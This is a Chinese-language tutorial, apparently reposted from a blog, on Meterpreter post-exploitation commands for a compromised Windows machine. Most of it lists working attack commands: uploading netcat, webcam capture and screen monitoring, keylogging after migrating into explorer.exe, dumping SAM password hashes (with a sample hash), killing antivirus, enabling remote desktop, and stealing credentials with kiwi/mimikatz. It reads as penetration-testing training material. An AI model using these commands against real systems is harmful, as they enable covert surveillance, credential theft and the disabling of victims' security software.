Metapreter 详细教程--进阶教程
常用命令
基本命令
| 命令 | 说明 |
|---|---|
| sysinfo | 查看系统信息 |
| ls | 列出目录或文件夹 |
| pwd | 获取当前目录地址 |
| cd | 切换目录,注意这里的win系统需要用用两个反斜杠来分割(cd c:\windows\system32 ) |
| help | 帮助 |
| getuid | 查看当前用户是谁 |
| getpid | 查看当前进程号 |
| ps | 查看所有进程 |
| background | 将当前会话放入后台运行 |
| shell | 获取一个交互式shell |
| sessions | 列出当前可以用的会话列表同show sessions 一样 |
| sessions -i <序号> | 切换到指定序号的会话到前台来 |
| quit | 关闭meterpreter会话 |
| irb | 获取系统配置信息的结果 |
sysinfo 查看系统信息

ls 列出当前目录

pwd 显示当前位置地址

help 帮助

getuid 查看当前用户

getpid 查看当前进程号

ps 查看当前所有进程

background 将当前会话切换到后台运行

sessions 列出当前可以用的会话

sessions -i 1 将选择的会话切换到前台来

quit 退出

文件系统命令
| 命令 | 说明 |
|---|---|
| mkdir | 创建文件夹 |
| cat | 查看文件内容 |
| rmdir | 删除文件夹 |
| cp | 复制文件 |
| mv | 移动文件或重命名文件 |
| edit | 编辑或创建文件 |
| rm | 删除文件 |
| download <文件名称> | 下载文件 |
| upload <文件名称> | 上传文件 |
| ipconfig/ifconfig | 查看网络配置 |
| search -f <文件名称(支持通配符)> | 搜索文件 |
以上命令前面加个 "l" 代表对本地系统进行操作 |
mkdir test 创建文件

edit test/test.txt 创建文件或编辑文件

cat test.txt 查看文件内容

cp test.txt test2.txt 文件复制

rm test2.txt 删除文件

search -f test* 搜索文件支持通配符

download test.txt 下载文件

upload -r /tmp/nc.txt c:/test/nc.exe 上传文件

用户控制和监视
| 命令 | 说明 |
|---|---|
| uictl enable keyboard | 启用键盘 |
| uictl enable mouse | 启用鼠标 |
| uictl disable keyboard | 禁用键盘 |
| uictl disable mouse | 禁用鼠标 |
| webcam_list | 查看摄像头 |
| webcam_snap | 通过摄像头拍照 |
| webcam_stream | 通过摄像头开启视频 |
| run getgui -e | 开启远程桌面 |
| screenshot | 抓屏 |
| screenshare | 实时监控桌面 |
| keyscan_start | 开启键盘记录 |
| keyscan_dump | 导出键盘记录 |
| keyscan_stop | 停止键盘记录 |
| migrate | 线程迁移 |
screenshot 抓屏


screenshare 实时监控屏幕


键盘记录
在开启键盘记录的时候需要先确当当前的用户是谁,因为记录只会记录当前用用户

我们发现是system权限,但是我们要的权限是LivingOnHope的权限,这是我们需要切换到LivingOnHope的进程中去通过migrate 命令执行,这里我们选择explorer.exe进程,这个进程是windows的外壳程序(管理桌面的程序如果关闭桌面将啥也没有了)
migrate 2476
keyscan_start 开启键盘记录
keyscan_dump 下载记录内容
keyscan_stop 停止键盘记录


execute 执行文件命令
| 参数 | 说明 |
|---|---|
| -h | 帮助 |
| -H | 后台运行 |
| -i | 执行后与进程进行交流 |
| -d | 在目标主机执行时显示的进程名称(作为装用) |
| -m | 直接从内存中运行 |
| -a | 执行命令需要的参数 |
execute -H -i -f cmd.exe
hashdump 获取密码HASH
windows的密码文件存放路径 C:\Windows\System32\config\SAM 密码存放在SAM文件中,在老的windows系统中用的是LM 加密方式 在新的系统中如win10win11等系统都是采用NTLM加密

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
用户名称为:Administrator
RID为:500
LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EE
NT-HASH值为:683020925C5D8569C23AA724774CE6CC

run killav 关闭杀毒软件
run kilav 关闭杀毒软件(在关闭杀毒软件的同时也会关闭cmd,这个命令可能会造成系统死机的情况)
这里因为win7没有杀毒软件所有是found
检测是否运行在虚拟机
run post/windows/gather/checkvm

枚举当前登录的用户
un post/windows/gather/enum_logged_on_users

mimikatz和KiWi
在msf6中mimikatz已经被kiwi所取代了,必须是system来运行
load mimikatz 将mimikatz模块加入到metapreter中(因为mimikatz已经被kiwi所替代所有输入这个命令加载的也是kiwi)
load 加载模块
creds_all 获取所有凭证(在win7及其以下的版本是可以直接获取到当前登录人输入的登录口令的,win10及其以上的版本是不能直接获取到的,只能获取到HASH密码)
开启远程桌面
run post/windows/manage/enable_rdp

rdesktop 172.30.1.133
kali 中的一个远程桌面工具

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!






